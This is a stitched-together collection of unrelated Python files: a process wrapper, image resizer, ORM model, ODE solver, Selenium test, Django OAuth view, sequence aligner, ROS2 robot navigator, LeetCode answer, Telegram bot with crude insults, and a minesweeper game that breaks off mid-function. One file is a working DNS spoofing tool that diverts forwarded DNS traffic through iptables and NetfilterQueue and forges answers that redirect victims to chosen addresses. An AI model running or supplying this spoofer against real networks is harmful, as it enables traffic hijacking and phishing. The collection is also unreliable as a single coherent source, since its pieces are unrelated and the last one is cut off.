        if hasattr(self, "proc") and self.proc is not None:
            if self.proc.poll() is None:
                self.proc.terminate()
                self.proc.poll()
        else:
            raise UninitializedException(self)

    def kill(self):
        """Forcibly kill a running child (SIGKILL)."""
        if hasattr(self, "proc") and self.proc is not None:
            if self.proc.poll() is None:
                self.proc.kill()
                self.proc.poll()
        else:
            raise UninitializedException(self)

    def force_terminate(self, timeout=10):
        """terminate(), then kill() if the child survives past *timeout*."""
        if hasattr(self, "proc") and self.proc is not None:
            self.terminate()
            try:
                self.wait(timeout)
            except subprocess.TimeoutExpired:
                self.kill()
        else:
            raise UninitializedException(self)

    def status_string(self):
        """Return 'running' or 'terminated'."""
        if hasattr(self, "proc") and self.proc is not None:
            if self.proc.poll() is None:
                return "running"
            else:
                return "terminated"
        else:
            raise UninitializedException(self)

    def get_data(self):
        """Return a summary dict: id, command, status, and pid or exit code."""
        procdata = {
            "id": self.internalId,
            "command": self.cmdString,
            "status": self.status_string()
        }
        if procdata["status"] == "running":
            procdata["pid"] = self.pid()
        else:
            procdata["code"] = self.code(False)
        return procdata
from PIL import Image, PngImagePlugin
import os
def save_resized_image(image):
    """Convert one image to RGB, shrink it to fit 1080x1080, and store the
    result as a JPEG in the resized_images directory."""
    # lift Pillow's decompression-bomb limits for very large source files
    PngImagePlugin.MAX_TEXT_CHUNK = 100 * (1024**2)
    Image.MAX_IMAGE_PIXELS = None
    picture = Image.open(image)
    picture = picture.convert('RGB')
    picture.thumbnail((1080, 1080))
    # Although thumbnail() should yield 1080 on the longer side, "anomalies"
    # such as 1000x600 do occur and must be filtered out.
    if 1080 in (picture.width, picture.height):
        file_name = image.split(os.sep)[-1].replace(".png", ".jpg")
        destination = f'resized_images{os.sep}' + file_name
        picture.save(destination, format="JPEG")
def save_resized_images_in_directory(path):
    """Resize every .jpg/.png image found directly inside *path*.

    Missing source directories are skipped silently; the output directory
    ``resized_images`` is created on demand.
    """
    try:
        images = os.listdir(path)
    except FileNotFoundError:
        images = []
    # exist_ok replaces the original try/except FileExistsError dance
    os.makedirs("resized_images", exist_ok=True)
    for image in images:
        # bug fix: the original substring test (".jpg" in image) also
        # matched non-image names such as "photo.jpg.part"
        if image.endswith((".jpg", ".png")):
            save_resized_image(path + image)
def main():
    """Resize all downloaded Hubble and SpaceX images."""
    source_dirs = (
        f'images{os.sep}hubble{os.sep}',
        f'images{os.sep}hubble{os.sep}spacecraft{os.sep}',
        f'images{os.sep}hubble{os.sep}news{os.sep}',
        f'images{os.sep}spacex{os.sep}',
    )
    for source_dir in source_dirs:
        save_resized_images_in_directory(source_dir)
# Script entry point: resize images from each configured source directory.
if __name__ == "__main__":
    main()
|
import datetime
from sqlalchemy import Column, Integer, ForeignKey, text, TIMESTAMP
from sqlalchemy.dialects.mysql import TEXT
from goldfnd.models import Base
class SurveyAnswerRule(Base):
    """ORM model mapping a combination of survey answers to a reply.

    ``survey_answer_combinations`` stores a serialized representation of
    the answer set; presumably a delimited string -- verify the exact
    format against the callers of ``find_proper_reply_id``.
    """
    __tablename__ = 'survey_answer_rule'

    # surrogate primary key
    id = Column(Integer, primary_key=True, autoincrement=True)
    # survey this rule belongs to
    survey_id = Column(Integer, ForeignKey('survey.id'))
    # reply to use when the stored combination matches
    reply_id = Column(Integer, ForeignKey('reply.id'))
    # serialized answer combination used as the lookup key
    survey_answer_combinations = Column(TEXT, nullable=False)
    # row timestamps, maintained both client-side (default/onupdate) and
    # server-side (CURRENT_TIMESTAMP)
    created_at = Column(TIMESTAMP(timezone=True), default=datetime.datetime.now, nullable=False,
                        server_default=text('CURRENT_TIMESTAMP'))
    updated_at = Column(TIMESTAMP(timezone=True), default=datetime.datetime.now, onupdate=datetime.datetime.now,
                        nullable=False, server_default=text('CURRENT_TIMESTAMP'),
                        server_onupdate=text('CURRENT_TIMESTAMP'))

    @classmethod
    def bulk_insert_answer_rule(cls, session, rows):
        """Insert many rules in one round trip.

        :param session: SQLAlchemy session to use
        :param rows: iterable of dicts whose keys match the column names
        :returns: True after a successful commit
        """
        answers = [cls(**row) for row in rows]
        session.bulk_save_objects(answers)
        session.commit()
        return True

    @classmethod
    def find_proper_reply_id(cls, session, combination_string):
        """Return the reply_id whose stored combination equals
        *combination_string*, or None when no rule matches."""
        reply_id = session.query(cls.reply_id).filter(cls.survey_answer_combinations == combination_string).scalar()
        return reply_id
|
# Implementation of the classical 4th-order Runge-Kutta method for a
# second-order ODE. We will use this to solve the precession of the
# perihelion of Mercury later on.
# Example:
#   The 2nd-order ODE is: d2y/dx2 + dy/dx - 6y = 0
#   The decoupled first-order equations are:
#     dy/dx = z
#     dz/dx = 6y - z
# Start by defining two general first-order ODEs.
def f(x, y, z):
    """First decoupled equation: dy/dx = z."""
    return float(z)
def g(x, y, z):
    """Second decoupled equation: dz/dx = 6y - z."""
    return float(6 * y - z)
def main():
    """Integrate the decoupled system with the classical RK4 scheme.

    Uses step size h = 0.05 over the interval [0, 1] with initial
    conditions y(0) = 3, y'(0) = 1, and prints the final y and z = y'.
    """
    h = 0.05   # step size
    s = 0      # progress through the interval
    e = 1      # end of the interval
    # initial conditions
    xi = 0.0
    yi = 3.0
    zi = 1.0
    while s <= e:
        k0 = h * f(xi, yi, zi)
        l0 = h * g(xi, yi, zi)
        k1 = h * f(xi + (1.0/2.0)*h, yi + (1.0/2.0)*k0, zi + (1.0/2.0)*l0)
        l1 = h * g(xi + (1.0/2.0)*h, yi + (1.0/2.0)*k0, zi + (1.0/2.0)*l0)
        k2 = h * f(xi + (1.0/2.0)*h, yi + (1.0/2.0)*k1, zi + (1.0/2.0)*l1)
        l2 = h * g(xi + (1.0/2.0)*h, yi + (1.0/2.0)*k1, zi + (1.0/2.0)*l1)
        k3 = h * f(xi + h, yi + k2, zi + l2)
        l3 = h * g(xi + h, yi + k2, zi + l2)
        # bug fix: the original left this commented out, so x never
        # advanced (harmless only because f and g do not depend on x)
        xi = xi + h
        yi = yi + ((1.0/6.0) * (k0 + 2*k1 + 2*k2 + k3))
        zi = zi + (1.0/6.0) * (l0 + 2*l1 + 2*l2 + l3)
        s = s + h
    print(yi)
    print(zi)
# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
LINK = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"


def test_add_to_cart_button_is_displayed(browser):
    """The product page must show a visible 'add to basket' button."""
    browser.get(LINK)
    locator = (By.CSS_SELECTOR, 'form#add_to_basket_form>button')
    wait = WebDriverWait(browser, 5)
    add_to_cart_button = wait.until(EC.visibility_of_element_located(locator))
    assert add_to_cart_button.is_displayed()
|
#! /usr/bin/env python2.7
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os,sys
def usage():
    # Print command-line usage for this script (Python 2 print statement).
    print "[*]Usage: python dnsspoof_with_queue.py [host file] [DNS_SERVER_IP]"
def modify(packet):
    # NetfilterQueue callback: spoof DNS answers for domains present in the
    # host mapping; accept (forward) every other packet untouched.
    print "Got packet"
    pkt = IP(packet.get_payload()) #converts the raw packet to a scapy compatible string
    #modify the packet all you want here
    if not pkt.haslayer(DNSQR):
        # not a DNS query -- let it through unchanged
        packet.accept()
    else:
        queried = pkt[DNS].qd.qname
        # NOTE(review): 'dict' shadows the builtin; presumably a module-level
        # {domain: IP} mapping built from the host file elsewhere in this
        # script -- verify it is defined before nfqueue.run() starts.
        for key in dict:
            if queried.find(key) != -1:
                spoofed_IP = dict[key]
                # forge a response that mirrors the query (same id/question)
                # but answers with our IP and a short TTL
                spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=spoofed_IP))
                packet.set_payload(str(spoofed_pkt))
                packet.accept()
                print '[+] Redirecting ' + pkt[IP].src + " to " + spoofed_IP +" for domain " + queried
                return
        #print "No entries in host file for domain " + queried
        # no mapping matched -- forward the original query to the real server
        print "Forwarded packets to dns"
        packet.accept()
# Divert all forwarded DNS traffic (UDP/53) into NFQUEUE number 1 so that
# modify() gets to inspect and potentially rewrite each query.
os.system('iptables -A FORWARD -p udp --dport 53 -j NFQUEUE --queue-num 1')
nfqueue = NetfilterQueue()
nfqueue.bind(1, modify)
try:
    print "[*] waiting for data"
    # blocks until interrupted; Ctrl-C exits cleanly
    nfqueue.run()
except KeyboardInterrupt:
    pass
# System
from datetime import timedelta
# Django
from django.utils import timezone
from django.views.generic import View
from django.shortcuts import render
from django.shortcuts import redirect
from django.urls import reverse
from django.http import Http404
# Open Pipelines
from ..models import User
from ..services import ServiceManager
class LoginView(View):
    """Renders the login page listing every available OAuth service."""

    def get(self, request):
        services = ServiceManager().get_services()
        context = {"services": services}
        return render(request, "login.html", context)
class LoginWithServiceView(View):
    """Handles the OAuth2 round-trip for a single authentication service."""

    def get(self, request, service_id):
        """Redirect to the service's OAuth page, or -- when redirected
        back -- exchange the authorization code for tokens and log in.

        Raises Http404 for an unknown service_id.
        """
        service_manager = ServiceManager()
        try:
            service = service_manager.get_service(service_id)
        except ServiceManager.DoesNotExist:
            raise Http404()
        # User was redirected back with an error
        # (idiom fix: identity comparison with None instead of !=)
        if request.GET.get("error") is not None:
            return render(request, "login_error.html")
        # User was redirected back with an authorization code
        if request.GET.get("code") is not None:
            oauth_code = request.GET.get("code")
            oauth_data = service.process_oauth(oauth_code)
            if oauth_data is None:
                return render(request, "login_error.html")
            # create or refresh the local account tied to this service identity
            user, \
            user_created = User.objects.update_or_create(
                username = "{0}:{1}".format(service.get_id(), oauth_data.get("username")),
                defaults = {
                    "display_name"    : oauth_data.get("display_name"),
                    "service_id"      : service.get_id(),
                    "service_username": oauth_data.get("username"),
                    "service_atoken"  : oauth_data.get("atoken"),
                    "service_rtoken"  : oauth_data.get("rtoken"),
                    "service_etoken"  : oauth_data.get("etoken"),
                    "last_login"      : timezone.now(),
                }
            )
            # rotate the session before storing the authenticated identity
            request.session.flush()
            request.session["user_uuid"] = str(user.uuid)
            return redirect(reverse("index"))
        # First visit: send the user to the service's OAuth2 consent page
        return redirect(service.get_oauth_url())
|
import sys
from itertools import product
from rosalind_utility import parse_fasta
def multiple_alignment(str_list):
    """Compute a maximum-score multiple alignment of the given strings.

    Scoring: each mismatching pair of symbols in a column costs -1 (matched
    symbols, including matched gaps, cost 0), which amounts to a linear gap
    penalty of 1 per pairwise gap.

    :param str_list: list of strings (no '-' characters expected)
    :returns: tuple ``(max_score, alignment)`` where ``alignment`` is a list
        of equal-length strings using '-' as the gap symbol
    """
    # prepend a dummy '-' so string position i maps onto DP index i
    str_list = ["-" + string for string in str_list]
    score_mat = {}
    backtrack_mat = {}

    def add_tuples_elemwise(t1, t2):
        # element-wise sum of two index tuples
        return tuple(sum(x) for x in zip(t1, t2))

    ## all possible "moves": every non-empty subset of strings advances one step
    perm_list = list(product([0, -1], repeat=len(str_list)))[1:]

    ## fill the n-dimensional score and backtrack matrices
    for index in product(*(range(len(s) + 1) for s in str_list)):
        if index.count(0) >= len(str_list) - 1:
            # boundary cell: at most one coordinate is non-zero
            if sum(index) == 0:
                score_mat[index] = 0
            else:
                # only gaps paired against the single advancing string
                score_mat[index] = -max(index)
                move = tuple(0 if coord == 0 else -1 for coord in index)
                # idiom fix: the move advances exactly one string and is
                # therefore always present, so list.index replaces the
                # original manual enumerate-and-break search
                backtrack_mat[index] = perm_list.index(move)
        else:
            possible_scores = []
            for perm_idx, move in enumerate(perm_list):
                prev_idx = add_tuples_elemwise(index, move)
                if -1 not in prev_idx:
                    prev_score = score_mat[prev_idx]
                    # the column of symbols this move emits ('-' for every
                    # string that does not advance)
                    chars = [str_list[i][index[i] - 1] if val == -1 else "-"
                             for i, val in enumerate(move)]
                    # -1 for every mismatching pair within the column
                    current_cost = 0
                    for i in range(len(chars) - 1):
                        for j in range(i + 1, len(chars)):
                            if chars[i] != chars[j]:
                                current_cost -= 1
                    possible_scores.append((prev_score + current_cost, perm_idx))
            # max() keeps the first maximum, so ties resolve to the earliest move
            score_mat[index], backtrack_mat[index] = max(possible_scores, key=lambda p: p[0])

    ## backtrack from the terminal corner
    alignment = ["" for _ in str_list]
    current_index = list(map(len, str_list))
    max_score = score_mat[tuple(current_index)]
    while sum(current_index) != 0:
        permutation = perm_list[backtrack_mat[tuple(current_index)]]
        for i, perm_value in enumerate(permutation):
            if perm_value == 0:
                alignment[i] = "-" + alignment[i]
            else:
                alignment[i] = str_list[i][current_index[i] - 1] + alignment[i]
        current_index = add_tuples_elemwise(tuple(current_index), permutation)

    ## drop columns made entirely of gaps (artifacts of the dummy prefix)
    keep = [pos for pos in range(len(alignment[0]))
            if any(s[pos] != "-" for s in alignment)]
    alignment = ["".join(s[pos] for pos in keep) for s in alignment]
    return max_score, alignment
if __name__ == "__main__":
    '''
    Given: A collection of four DNA strings of length at most 10 bp in FASTA format.
    Return: A multiple alignment of the strings having maximum score, where we score matched symbols 0 (including
    matched gap symbols) and all mismatched symbols -1 (thus incorporating a linear gap penalty of 1).
    '''
    # read FASTA records from stdin; parse_fasta comes from rosalind_utility
    input_lines = sys.stdin.read().splitlines()
    DNA_strings_list = list(parse_fasta(input_lines).values())
    score, alignment = multiple_alignment(DNA_strings_list)
    # print the score followed by one aligned string per line
    print(score)
    for aligned in alignment:
        print(aligned)
|
# Copyright 2016 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from nav_msgs.msg import Odometry
from geometry_msgs.msg import Twist
from rclpy.qos import qos_profile_sensor_data
from sensor_msgs.msg import LaserScan
from nav_msgs.msg import OccupancyGrid
from tf2_ros import LookupException, ConnectivityException, ExtrapolationException
import numpy as np
import matplotlib.pyplot as plt
import tf2_ros
import math
import cmath
import time
import scipy.stats
import random
from PIL import Image, ImageDraw
# constants
rotatechange = 0.5  # angular speed used while turning (rad/s)
speedchange = 0.1  # forward linear speed (m/s)
occ_bins = [-1, 0, 50, 100]  # occupancy-grid bin edges: unknown / free / occupied
stop_distance = 0.55  # obstacle distance that triggers a stop (m)
front_angle = 30  # half-width of the forward-looking cone (degrees)
front_angles = range(-front_angle, front_angle + 1, 1)  # scan indices in that cone
scanfile = 'lidar.txt'
mapfile = f"newmap{time.strftime('%Y%m%d%H%M%S')}.txt"  # timestamped map dump
laserfile = 'laser.txt'
angle_array = []
points = []
nan_array = []
laser_array = []
map_bg_color = 1
random_angle = [0, -90, 90, 180]
# code from https://automaticaddison.com/how-to-convert-a-quaternion-into-euler-angles-in-python/
def euler_from_quaternion(x, y, z, w):
    """
    Convert a quaternion into euler angles (roll, pitch, yaw).

    roll  is rotation around x in radians (counterclockwise)
    pitch is rotation around y in radians (counterclockwise)
    yaw   is rotation around z in radians (counterclockwise)
    """
    sinr_cosp = +2.0 * (w * x + y * z)
    cosr_cosp = +1.0 - 2.0 * (x * x + y * y)
    roll_x = math.atan2(sinr_cosp, cosr_cosp)

    sinp = +2.0 * (w * y - z * x)
    # clamp to [-1, 1] so numerical noise cannot push asin out of domain
    sinp = +1.0 if sinp > +1.0 else sinp
    sinp = -1.0 if sinp < -1.0 else sinp
    pitch_y = math.asin(sinp)

    siny_cosp = +2.0 * (w * z + x * y)
    cosy_cosp = +1.0 - 2.0 * (y * y + z * z)
    yaw_z = math.atan2(siny_cosp, cosy_cosp)

    return roll_x, pitch_y, yaw_z  # in radians
class AutoNav(Node):
    """ROS2 node that wanders a TurtleBot: it drives toward the most open
    lidar direction and stops/re-picks whenever an obstacle gets too close
    in front."""

    def __init__(self):
        super().__init__('auto_nav')
        # publisher for velocity commands plus an auxiliary 'fly' topic
        self.publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)
        self.fly_ = self.create_publisher(String, 'fly', 11)
        self.get_logger().info('Created publisher')
        # subscription to odometry, used to track pose and orientation
        self.odom_subscription = self.create_subscription(
            Odometry,
            'odom',
            self.odom_callback,
            10)
        self.get_logger().info('Created subscriber')
        self.odom_subscription  # prevent unused variable warning
        # pose and navigation bookkeeping
        self.roll = 0
        self.pitch = 0
        self.yaw = 0
        self.x = 0
        self.y = 0
        self.center_x = 0
        self.center_y = 0
        self.unmap_x = 0
        self.unmap_y = 0
        self.dist_x = 0
        self.dist_y = 0
        self.angle_to_unmap = 0
        self.dist_to_unmap = 0
        self.prev_dist_to_unmap = []
        self.laser_count = 0
        self.why_stop = 0
        self.tfBuffer = tf2_ros.Buffer()
        self.tfListener = tf2_ros.TransformListener(self.tfBuffer, self)
        # subscription to the SLAM occupancy grid
        self.occ_subscription = self.create_subscription(
            OccupancyGrid,
            'map',
            self.occ_callback,
            qos_profile_sensor_data)
        self.occ_subscription  # prevent unused variable warning
        self.occdata = np.array([])
        # subscription to raw lidar scans
        self.scan_subscription = self.create_subscription(
            LaserScan,
            'scan',
            self.scan_callback,
            qos_profile_sensor_data)
        self.scan_subscription  # prevent unused variable warning
        self.laser_range = np.array([])

    def odom_callback(self, msg):
        """Cache the latest pose: Euler orientation plus x/y position."""
        orientation_quat = msg.pose.pose.orientation
        self.roll, self.pitch, self.yaw = euler_from_quaternion(
            orientation_quat.x, orientation_quat.y,
            orientation_quat.z, orientation_quat.w)
        self.x = msg.pose.pose.position.x
        self.y = msg.pose.pose.position.y

    def occ_callback(self, msg):
        """Bin the occupancy grid into unknown/free/occupied, mark the
        robot's current cell, and dump the grid to ``mapfile``."""
        msgdata = np.array(msg.data)
        # binnum assigns each cell to a bin (1..3) per occ_bins; it doubles
        # as the image data below
        occ_counts, edges, binnum = scipy.stats.binned_statistic(
            msgdata, np.nan, statistic='count', bins=occ_bins)
        # locate base_link in the map frame:
        # lookup_transform(target_frame, source_frame, time)
        try:
            trans = self.tfBuffer.lookup_transform('map', 'base_link', rclpy.time.Time())
        except (LookupException, ConnectivityException, ExtrapolationException):
            self.get_logger().info('No transformation found')
            return
        cur_pos = trans.transform.translation
        # convert the metric pose into grid coordinates
        map_res = msg.info.resolution
        map_origin = msg.info.origin.position
        grid_x = round((cur_pos.x - map_origin.x) / map_res)
        grid_y = round(((cur_pos.y - map_origin.y) / map_res))
        # binnum values are 1..3, so uint8 suffices; reshape to 2D (row-major)
        odata = np.uint8(binnum.reshape(msg.info.height, msg.info.width))
        # mark the robot's current cell
        odata[grid_y][grid_x] = 0
        self.occdata = odata
        # print to file
        np.savetxt(mapfile, self.occdata)

    def scan_callback(self, msg):
        """Cache the lidar ranges, replacing invalid 0 readings with NaN."""
        self.laser_range = np.array(msg.ranges)
        self.laser_range[self.laser_range == 0] = np.nan

    def rotatebot(self, rot_angle):
        """Rotate in place by ``rot_angle`` degrees.

        Headings are compared as unit complex numbers to avoid wrap-around
        problems when angles cross 360->0 or -180->180.
        """
        self.get_logger().info('In rotatebot')
        twist = Twist()
        current_yaw = self.yaw
        self.get_logger().info('Current: %f' % math.degrees(current_yaw))
        c_yaw = complex(math.cos(current_yaw), math.sin(current_yaw))
        target_yaw = current_yaw + math.radians(rot_angle)
        c_target_yaw = complex(math.cos(target_yaw), math.sin(target_yaw))
        self.get_logger().info('Desired: %f' % math.degrees(cmath.phase(c_target_yaw)))
        # dividing the headings yields the remaining rotation; the sign of
        # its imaginary part tells us which way to turn
        c_change = c_target_yaw / c_yaw
        c_change_dir = np.sign(c_change.imag)
        # rotate on the spot: zero linear speed
        twist.linear.x = 0.0
        twist.angular.z = c_change_dir * rotatechange
        self.publisher_.publish(twist)
        # keep turning until the sign of the remaining rotation flips
        c_dir_diff = c_change_dir
        while (c_change_dir * c_dir_diff > 0):
            # allow the callback functions to run
            rclpy.spin_once(self)
            current_yaw = self.yaw
            c_yaw = complex(math.cos(current_yaw), math.sin(current_yaw))
            c_change = c_target_yaw / c_yaw
            c_dir_diff = np.sign(c_change.imag)
        self.get_logger().info('End Yaw: %f' % math.degrees(current_yaw))
        # stop the rotation
        twist.angular.z = 0.0
        self.publisher_.publish(twist)

    def pick_direction(self):
        """Turn toward the lidar bearing with the greatest clearance and
        start driving forward."""
        if self.laser_range.size != 0:
            # bug fix: the original assigned a throwaway variable and then
            # used the undefined name lr2i, raising NameError whenever scan
            # data was present; pick the farthest valid reading instead
            lr2i = np.nanargmax(self.laser_range)
        else:
            lr2i = 0
            self.get_logger().info('No data!')
        # scan indices are one per degree, so the index is the angle to turn
        self.rotatebot(float(lr2i))
        self.get_logger().info('Start moving')
        twist = Twist()
        twist.linear.x = speedchange
        twist.angular.z = 0.0
        # not sure if this is really necessary, but things seem to work
        # more reliably with this settling delay
        time.sleep(1)
        self.publisher_.publish(twist)

    def stopbot(self):
        """Publish a zero-velocity command to halt the robot."""
        self.get_logger().info('In stopbot')
        twist = Twist()
        twist.linear.x = 0.0
        twist.angular.z = 0.0
        self.publisher_.publish(twist)

    def bfs(self, graph, start, end):
        """Breadth-first search on a 100x100 grid.

        ``graph`` is indexed as graph[x, y]; cells equal to 0 are blocked.
        Returns the shortest 8-connected path from ``start`` to ``end`` as
        a list of [x, y] pairs (both endpoints included), or None when no
        path exists.

        Bug fix: the original hand-unrolled neighbor code was a copy-paste
        of the (x+1, y+1) case (with mismatched append/return coordinates),
        so most directions were never explored.
        """
        start = [start[0], start[1]]
        end = [end[0], end[1]]
        if start == end:
            return [start]
        offsets = ((1, 0), (1, -1), (0, -1), (-1, -1),
                   (-1, 0), (-1, 1), (0, 1), (1, 1))
        queue = [[start]]
        visited = {tuple(start)}
        while queue:
            path = queue.pop(0)
            x, y = path[-1]
            for dx, dy in offsets:
                nx, ny = x + dx, y + dy
                if not (0 <= nx < 100 and 0 <= ny < 100):
                    continue
                if (nx, ny) in visited or graph[nx, ny] == 0:
                    continue
                new_path = path + [[nx, ny]]
                if [nx, ny] == end:
                    return new_path
                visited.add((nx, ny))
                queue.append(new_path)
        # end is unreachable from start
        return None

    def mover(self):
        """Main wander loop: drive forward, stopping to re-pick a direction
        whenever something inside the front cone is closer than
        ``stop_distance``."""
        try:
            # find direction with the largest distance from the lidar,
            # rotate to that direction, and start moving
            self.pick_direction()
            while rclpy.ok():
                if self.laser_range.size != 0:
                    # readings in the front cone closer than stop_distance
                    lri = (self.laser_range[front_angles] < float(stop_distance)).nonzero()
                    if (len(lri[0]) > 0):
                        self.why_stop = 2
                        self.stopbot()
                        self.pick_direction()
                # allow the callback functions to run
                rclpy.spin_once(self)
        except Exception as e:
            print(e)
        # Ctrl-c detected
        finally:
            # always halt the robot on the way out
            self.stopbot()
def main(args=None):
    """Initialize rclpy, run the AutoNav wander loop, then shut down."""
    rclpy.init(args=args)
    auto_nav = AutoNav()
    auto_nav.mover()
    # Destroy the node explicitly (optional -- the garbage collector would
    # otherwise do it when the node object is collected).
    auto_nav.destroy_node()
    rclpy.shutdown()


if __name__ == '__main__':
    main()
|
# @Title: 打家劫舍 (House Robber)
# @Author: 2464512446@qq.com
# @Date: 2020-11-23 12:10:29
# @Runtime: 32 ms
# @Memory: 13.5 MB
# bug fix: List was used in the annotation below without ever being
# imported, which raised NameError when the method was defined
from typing import List


class Solution:
    """LeetCode 198 -- House Robber."""

    def rob(self, nums: List[int]) -> int:
        """Return the maximum loot obtainable without robbing two
        adjacent houses.

        Rolling-variable DP: prev2/prev1 track dp[i-2]/dp[i-1], reducing
        the original O(n) table to O(1) extra space.
        """
        prev2 = 0  # best total up to house i-2
        prev1 = 0  # best total up to house i-1
        for value in nums:
            # either skip this house (prev1) or rob it on top of prev2
            prev2, prev1 = prev1, max(prev1, prev2 + value)
        return prev1
|
import telebot
import config
import random
import numpy

# running count of '/talk' invocations (mutated inside the message handler)
e = 0
# the bot token lives in the local config module
bot = telebot.TeleBot(config.TOKEN)
@bot.message_handler(content_types=['text'])
def lalala(message):
    """Reply to an incoming text message.

    Commands: /say (random phrase), /talk (echo-based chatter once enough
    messages have arrived); certain keywords trigger themed responses.
    """
    # bug fix: e is read and modified below, so without this declaration
    # the '/talk' branch raised UnboundLocalError
    global e
    t = message.text
    # NOTE(review): arr is rebuilt per message, so it only ever holds the
    # current text; presumably a message history was intended -- verify
    arr = []
    arr.append(message.text)
    if t == "/say":
        array = ["Я крутой", "Сбежал из дурки", "Я - патриот Российской Федерации", "Ставь лайк чтобы жалко", "Что все пристали к этому Путену???",
                 "Моргенштерн - козел"]
        bot.send_message(message.chat.id, random.choice(array))
    elif "морген" in t.lower() and "дурк" in t.lower():
        bot.send_message(message.chat.id, "Спорный вопрос, но могу сказать одно")
        bot.send_message(message.chat.id, "Моргештерн - дурачок!!")
    elif "дурк" in t.lower():
        array = ["Зачем говорить про дурку?", "Дурка - как раз твое место!", "Путин - класс, и это не обсуждается", "Я крутой, а ты из дурки!",
                 "Мне тебя жалко, раз у тебя на устах лишь психиатрическая больница"]
        textOfArray = random.choice(array)
        a = random.choice([0, 1, 2, 3, 4, 5])
        # append a random hospital number to one particular phrase
        if textOfArray == "Мне тебя жалко, раз у тебя на устах лишь психиатрическая больница":
            if a == 1:
                textOfArray += " номер 4"
            elif a == 2:
                textOfArray += " номер 13"
            elif a == 3:
                textOfArray += " номер 65"
            elif a == 4:
                textOfArray += " номер 1411"
            elif a == 5:
                textOfArray += " номер 534"
        bot.send_message(message.chat.id, textOfArray)
    elif "морген" in t.lower():
        bot.send_message(message.chat.id, "Моргештерн - дебил")
        bot.send_message(message.chat.id, "Он реально тупой")
        bot.send_message(message.chat.id, "дурачок")
    elif t == "/talk":
        e += 1
        if e > 3:
            r = random.choice(arr)
            while True:
                a = random.choice([0, 1])
                if a == 0:
                    break
                # bug fix: random.choice was called without an argument,
                # which concatenated the function object into the string
                r += " " + random.choice(arr)
            bot.send_message(message.chat.id, r)
        else:
            # bug fix: the original built a tuple ("Их всего ", e)
            # instead of a string
            r = "Их всего " + str(e)
            bot.send_message(message.chat.id, "Недостаточно сообщений для воспроизведения")
            bot.send_message(message.chat.id, r)
    else:
        array2 = ["Не понял вас", "Вот скажите мне, зачем вы мне это написали?", "Не понимаю вас вообще", "Что вы несете, простите?",
                  "Не понимаю вас. Что ж, я еще развиваюсь", "Не нравится мне такой ваш акцент", message.text]
        bot.send_message(message.chat.id, random.choice(array2))
# Start long-polling; none_stop keeps the bot alive across API errors.
bot.polling(none_stop=True)
|
# Anjali Mangla
# 10/08/2018
# This code is the code for a minesweeper game in which participants must flag all of the bombs and not uncover any bombs before they finish the game.
# This is the link on string splitting:
# https://www.geeksforgeeks.org/python-string-split/
# On my honor, I have neither given nor received unauthorized aid.
import sys
import random as r

# keep track of flag positions
flags = []
# count of the spaces that have been revealed
numRevealed = 0
correctFlags = 0
# keep track of bomb positions
bombs = []
# queue of zero cells still awaiting flood-fill processing
zerosRevealed = []

# get width, height and number of bombs from the command line; the +2 adds
# a hidden sentinel border around the playable board
try:
    w = int(sys.argv[1]) + 2
    h = int(sys.argv[2]) + 2
    b = int(sys.argv[3])
except (IndexError, ValueError):
    # bug fix: the original retried inside "while True", but sys.argv never
    # changes, so one bad argument produced an infinite loop of messages;
    # also catch IndexError for missing arguments
    print("Sorry, that is not an integer! Try again.")
    sys.exit(1)

# set field (hidden solution) and user field (what the player sees)
field = [[0]*w for x in range(h)]
userField = [["X"]*w for x in range(h)]
# start the game
def start():
    """Place the bombs, compute the neighbor counts, greet the player and
    enter the move loop via choose()."""
    global w
    global h
    global b
    # MAKE AN ARRAY OF THE X AND Y VALUES OF THE BOMBS
    for number in range(b):
        # bug fix: the original re-rolled a colliding position only once,
        # so duplicate positions (and therefore fewer than b bombs) were
        # possible; retry until the cell is free instead
        while True:
            x = r.randrange(1, w-1)
            y = r.randrange(1, h-1)
            if [x, y] not in bombs:
                break
        # array keeps track of bomb positions
        bombs.append([x, y])
        field[y][x] = "*"
    # for every bomb, increment the count of each non-bomb neighbor
    # (all 8 surrounding cells; the sentinel border keeps indices in range)
    for y in range(1, h-1):
        for x in range(1, w-1):
            if field[y][x] == "*":
                for dy in (-1, 0, 1):
                    for dx in (-1, 0, 1):
                        if (dx or dy) and field[y+dy][x+dx] != "*":
                            field[y+dy][x+dx] += 1
    print("Welcome to Minesweeper! You must flag all of the bombs in order to win the game. The top left corner of the board is (1,1) and going to the right adds to the x-value and down adds to the y-value. Make sure you flag all the bombs and show us your mastery of mine sweeping!")
    printUserField()
    choose()
# print at the end with 0s turning into the right number
# this is my "hidden solution" field
# choose the space, c or f
def choose():
    """Prompt for one move ("x, y, f|c"), apply it to the board, then
    continue the game via checkFlags()/choose() recursion."""
    global w
    global h
    global b
    space = input("Choose a space to either clear or flag. Provide the x and y coordinates, and type 'f' for flag and 'c' for clear. Enter your answer in the following format: x, y, [f or c] ") # can command line arguments work outside first python file calling
    # if flag, else (else if clear)
    # NOTE(review): split(',') keeps surrounding spaces, so typing the
    # suggested "x, y, f" yields ' f' which fails the == "f" test below
    # and falls through to the clear branch -- confirm the intended format
    userChoice = space.split(',')
    y = int(userChoice[1])
    x = int(userChoice[0])
    if userChoice[2] == "f":
        if userField[y][x] == "X":
            # place a flag on a hidden cell and remember it
            userField[y][x] = "f"
            flags.append([x,y])
            printUserField()
            checkFlags()
        else:
            print("You've already revealed that space! You can't flag it now!")
            printUserField()
            checkFlags()
    else:
        # check using solution
        if field[y][x] == "*":
            # clearing a bomb ends the game
            gameOver()
        else:
